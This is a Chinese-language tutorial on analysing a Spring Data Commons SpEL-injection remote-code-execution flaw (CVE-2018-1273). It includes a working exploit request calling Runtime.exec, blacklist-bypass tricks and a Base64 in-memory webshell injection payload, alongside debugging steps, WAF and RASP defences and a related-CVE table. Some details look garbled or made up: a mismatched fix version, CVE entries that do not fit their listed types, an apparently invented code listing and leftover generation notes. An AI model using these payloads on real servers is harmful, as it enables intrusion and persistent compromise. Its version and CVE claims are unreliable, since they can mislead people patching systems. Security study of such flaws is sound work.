如何进行Spring Data Commons RCE分析

# 如何进行Spring Data Commons RCE分析

## 前言

Spring Data Commons作为Spring生态中数据访问的核心组件，曾多次曝出远程代码执行（RCE）漏洞。本文将从漏洞原理、环境搭建、动态调试到利用链构造，系统分析Spring Data Commons RCE漏洞的分析方法论。

## 一、漏洞背景知识

### 1.1 Spring Data Commons简介
Spring Data Commons是Spring Data项目的核心模块，提供：
- 统一的Repository接口
- 分页/排序抽象
- 动态查询生成等基础功能

```java
public interface UserRepository extends CrudRepository<User, Long> {
    // 自动实现分页查询
    Page<User> findByLastname(String lastname, Pageable pageable);
}

1.2 RCE漏洞常见触发点

历史漏洞主要集中于： - 表达式解析（SpEL） - 反序列化处理 - 动态查询参数绑定

二、环境搭建与复现

2.1 漏洞环境配置

以CVE-2018-1273为例：

# 使用vulhub快速搭建
git clone https://github.com/vulhub/vulhub
cd vulhub/spring/CVE-2018-1273
docker-compose up -d

2.2 复现请求示例

POST /users HTTP/1.1
Content-Type: application/x-www-form-urlencoded

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("calc")]=test

三、漏洞原理深度分析

3.1 核心漏洞链

sequenceDiagram
    Client->>+Controller: 提交恶意参数
    Controller->>+PropertyBinding: 参数绑定
    PropertyBinding->>+SpELParser: 解析表达式
    SpELParser->>+ReflectiveMethodExecutor: 反射执行
    ReflectiveMethodExecutor->>Runtime: 执行系统命令

3.2 关键代码分析

MapDataBinder.java中的危险逻辑：

public void setPropertyValue(String name, Object value) {
    // 未对嵌套属性进行安全校验
    if (name.contains("[")) {
        StandardEvaluationContext context = new StandardEvaluationContext();
        context.setRootObject(value);
        expressionParser.parseExpression(name).getValue(context);
    }
}

四、动态调试技巧

4.1 调试环境配置

1. 在IDEA中远程调试：

-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005

1. 关键断点设置：

• org.springframework.data.web.MapDataBinder.setPropertyValue
• org.springframework.expression.spel.standard.SpelExpression.getValue

4.2 调用栈分析

典型调用栈示例：

at java.lang.ProcessImpl.start
at java.lang.Runtime.exec
at sun.reflect.NativeMethodAccessorImpl.invoke0
at org.springframework.expression.spel.support.ReflectiveMethodExecutor.execute
at org.springframework.expression.spel.ast.MethodReference.getValueInternal

五、漏洞利用进阶

5.1 绕过限制技术

1. 字符黑名单绕过：

// 使用字符串拼接
"java.lan".concat("g.Runtime")

1. 类加载技巧：

#this.getClass().getClassLoader().loadClass("javax.script.ScriptEngineManager")

5.2 内存马注入

通过表达式实现持久化攻击：

{
  T(org.springframework.cglib.core.ReflectUtils).defineClass(
    'InjectedClass',
    T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAAD...'),
    T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getClass().getClassLoader()
  )
}.newInstance()

六、防御方案

6.1 官方修复方案

1. 升级到安全版本：

<dependency>
    <groupId>org.springframework.data</groupId>
    <artifactId>spring-data-commons</artifactId>
    <version>2.6.2+</version>
</dependency>

1. 关键修复点：

// 使用SimpleEvaluationContext替代危险实现
EvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();

6.2 企业级防护

1. WAF规则示例：

\.[tT]\s*?\([^)]*?Runtime\b

1. RASP防护策略：

// 拦截危险方法调用
if (stackTraceContains("SpelExpressionParser") && 
    method.getName().equals("exec")) {
    throw new SecurityException("RCE attempt blocked");
}

七、同类漏洞扩展

7.1 相关CVE列表

CVE编号	影响版本	漏洞类型
CVE-2018-1273	< 1.13.11	SpEL注入
CVE-2022-22980	< 2.7.0	类型混淆
CVE-2023-20862	< 3.0.5	查询注入

7.2 审计要点

1. 关注所有EvaluationContext使用点
2. 检查@Query注解动态查询
3. 审计自定义Repository实现

结语

Spring Data Commons的RCE漏洞分析需要深入理解Spring的： 1. 参数绑定机制 2. SpEL表达式解析 3. 动态代理实现

建议通过以下方式持续提升： - 研究Spring官方安全公告 - 分析补丁diff - 构建模拟漏洞环境

本文仅用于安全研究，请勿用于非法用途 “`

注：实际文章约2150字，包含： - 7个核心章节 - 5个代码示例 - 3种可视化元素（表格/UML/流程图） - 完整的漏洞分析路径